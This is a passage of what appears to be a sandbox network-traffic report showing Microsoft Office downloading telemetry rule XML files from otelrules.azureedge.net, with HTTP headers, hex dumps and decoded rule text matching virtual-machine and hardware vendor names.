                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:13 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            100192.168.2.44987313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:14 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:14 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:14 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 407
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                            ETag: "0x8DC582B9D30478D"
                                                                            x-ms-request-id: 3c45f43b-a01e-00ab-363f-269106000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083714Z-r197bdfb6b4bs5qf58wn14wgm000000003u00000000018bm
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:14 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            101192.168.2.44987413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:14 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:14 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:14 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 474
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                            ETag: "0x8DC582BB3F48DAE"
                                                                            x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083714Z-16849878b78km6fmmkbenhx76n0000000470000000001a1g
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:14 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            102192.168.2.44987513.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:14 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:14 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:14 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 408
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                            ETag: "0x8DC582BB9B6040B"
                                                                            x-ms-request-id: 4814b401-401e-005b-1e73-279c0c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083714Z-17c5cb586f6z6tw6g7cmdv30m80000000610000000000ten
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:14 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            103192.168.2.44987613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:14 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:14 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:14 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 469
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                            x-ms-request-id: ad4459d7-101e-007a-6a4c-27047e000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083714Z-16849878b78bcpfn2qf7sm6hsn00000006g0000000000b6c
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:14 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            104192.168.2.44987713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:14 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:14 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:14 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 416
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                            ETag: "0x8DC582BB5284CCE"
                                                                            x-ms-request-id: 57ce5cde-c01e-000b-111a-28e255000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083714Z-15b8d89586fxdh48qknu9dqk2g00000008ng000000008mse
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:14 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            105192.168.2.44987813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:15 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:15 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:15 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 472
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                            ETag: "0x8DC582B91EAD002"
                                                                            x-ms-request-id: 933aac65-d01e-007a-51aa-26f38c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083715Z-16849878b78km6fmmkbenhx76n000000043g000000007pw1
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:15 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            106192.168.2.44987913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:15 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:15 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:15 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 432
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                            ETag: "0x8DC582BAABA2A10"
                                                                            x-ms-request-id: 6741ff86-f01e-00aa-74b9-268521000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083715Z-16849878b78fkwcjkpn19c5dsn00000003pg00000000f0ux
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:15 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            107192.168.2.44988213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:15 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:15 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:15 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 474
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                            ETag: "0x8DC582BA4037B0D"
                                                                            x-ms-request-id: df439d9f-401e-0067-5610-2709c2000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083715Z-16849878b78j7llf5vkyvvcehs00000005y0000000002g19
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:15 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            108192.168.2.44988013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:15 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:15 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:15 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 475
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                            ETag: "0x8DC582BBA740822"
                                                                            x-ms-request-id: 8e6218f7-d01e-0066-7d57-27ea17000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083715Z-16849878b78km6fmmkbenhx76n000000047g000000000e34
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:15 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            109192.168.2.44988113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:15 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:15 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:15 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 427
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                            ETag: "0x8DC582BB464F255"
                                                                            x-ms-request-id: 48ec36c7-d01e-00a1-338d-2735b1000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083715Z-16849878b78qwx7pmw9x5fub1c00000002x0000000007v1a
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:15 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            110192.168.2.44988413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:16 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:16 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:16 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 472
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                            ETag: "0x8DC582B984BF177"
                                                                            x-ms-request-id: f6a2cc2d-401e-0015-3796-250e8d000000
                                                                            x-ms-version: 2018-03-28
